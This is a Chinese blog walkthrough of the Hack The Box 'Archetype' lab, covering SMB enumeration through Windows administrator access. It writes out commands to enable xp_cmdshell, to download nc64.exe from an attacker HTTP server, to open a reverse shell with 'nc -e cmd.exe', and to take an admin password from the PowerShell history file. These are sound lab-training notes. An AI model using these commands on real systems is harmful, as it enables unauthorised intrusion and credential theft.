Hack The Box-start point-Archetype笔记
Archetype
Task1:
使用nmap扫描工具对IP进行扫描,得到开放端口及详细信息
nmap -sC -sV ip
-sV:探测开放的端口的系统/服务信息
Task2:
使用smbclient工具查看主机上可用的共享
smbclient -N -L ip
发现除了ADMIN$、C$和IPC$之外,还有一个backups,尝试空密码连接。
smbclient \\\\IP\\backups或smbclient -N \\\\IP\\backups
连接成功,则backups为非管理共享
Task3:
连接成功后输入ls命令,发现存在prod.dtsConfig文件,使用get命令下载并查看发现密码
Task4:
首先了解impacket
Impacket介绍:
Impacket是用于处理网络协议的Python类的集合。Impacket专注于提供对数据包的简单编程访问,以及协议实现本身的某些协议(例如SMB1-3和MSRPC)。数据包可以从头开始构建,也可以从原始数据中解析,而面向对象的API使处理协议的深层次结构变得简单。该库提供了一组工具,作为在此库找到可以执行的操作的示例。
项目地址:
https://github.com/SecureAuthCorp/impacket
于是下载该项目并安装
git clone https://github.com/SecureAuthCorp/impacket.git
我们使用task3中的账号密码进行登陆
python3 mssqlclient.py ARCHETYPE/sql_svc@IP -windows-auth
并使用命令判断我们是否为sysadmin,返回1代表true
select is_srvrolemember('sysadmin');
Task5:
根据上方help命令结果中可以知道大概是xp_cmdshell存储过程
对xp_cmdshell是否开启做测试,发现以及被关闭了,需要重新打开
用sp_configure将xp_cmdshell重新启动
exec sp_configure "show advanced options",1;
reconfigure;
exec sp_configure "xp_cmdshell",1;
reconfigure;
成功启动
在本机作准备,开启HTTP SERVER,并使用nc等待目标机回连。
在下载的nc目录下开启http server:sudo python3 -m http.server 80
并监听1234端口。
我们要在目标主机上上传文件,但由于我们不是管理员用户,不一定有权限在当前目录上传,先查看当前目录,可以用xp_cmdshell “powershell -c pwd”命令
下载好Windows的nc后,将nc上传过去
xp_cmdshell "powershell -c cd C:\Users\sql_svc\Downloads; wget http://10.10.15.166/nc64.exe -outfile nc64.exe"
使用nc的-e参数,连接本机的1234端口
xp_cmdshell "powershell -c cd C:\Users\sql_svc\Downloads; ./nc64.exe -e cmd.exe IP 1234"
并且在桌面找到user flag
执行net user命令发现目前用户和administrator用户不在同一组,所以需要提权
Task6:
根据task6的hint可知使用winPEAS工具
下载地址:
https://github.com/carlospolop/PEASS-ng/releases/download/refs%2Fpull%2F260%2Fmerge/winPEASx64.exe
下载后在shell中上传到目标主机上
powershell -c "wget http://10.10.15.166/winPEASx64.exe -outfile winPEASx64.exe
运行该软件进行扫描,再扫描结果中发现Current Token privileges有SeImpersonatePrivilege,容易受到 juicy potato 的攻击。首先检查可以找到凭据的两个现有文件。
由于这是一个普通用户帐户以及服务帐户,因此值得检查频繁访问的文件或执行的命令。在检查结果中,发现在PowerShell Settings中,有PS的历史记录文件ConsoleHost_history.txt,它相当于 Linux 系统的.bash_history。ConsoleHost_history.txt位于目录C:\Users\sql_svc\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\。
Task7:
找到ConsoleHost_history.txt文件并查看得到administrator密码
得到admin的密码后可以用Impcaket工具包里的脚本psexec.py来横向,得到administrator的shell
进入桌面目录,看到root.txt,得到root flag
本文作者:掘掘子
本文链接:https://www.cnblogs.com/juejuezi/p/18075134
版权声明:本作品采用知识共享署名-非商业性使用-禁止演绎 2.5 中国大陆许可协议进行许可。
【推荐】国内首个AI IDE,深度理解中文开发场景,立即下载体验Trae
【推荐】编程新体验,更懂你的AI,立即体验豆包MarsCode编程助手
【推荐】抖音旗下AI助手豆包,你的智能百科全书,全免费不限次数
【推荐】轻量又高性能的 SSH 工具 IShell:AI 加持,快人一步
· 无需6万激活码!GitHub神秘组织3小时极速复刻Manus,手把手教你使用OpenManus搭建本
· Manus爆火,是硬核还是营销?
· 终于写完轮子一部分:tcp代理 了,记录一下
· 别再用vector<bool>了!Google高级工程师:这可能是STL最大的设计失误
· 单元测试从入门到精通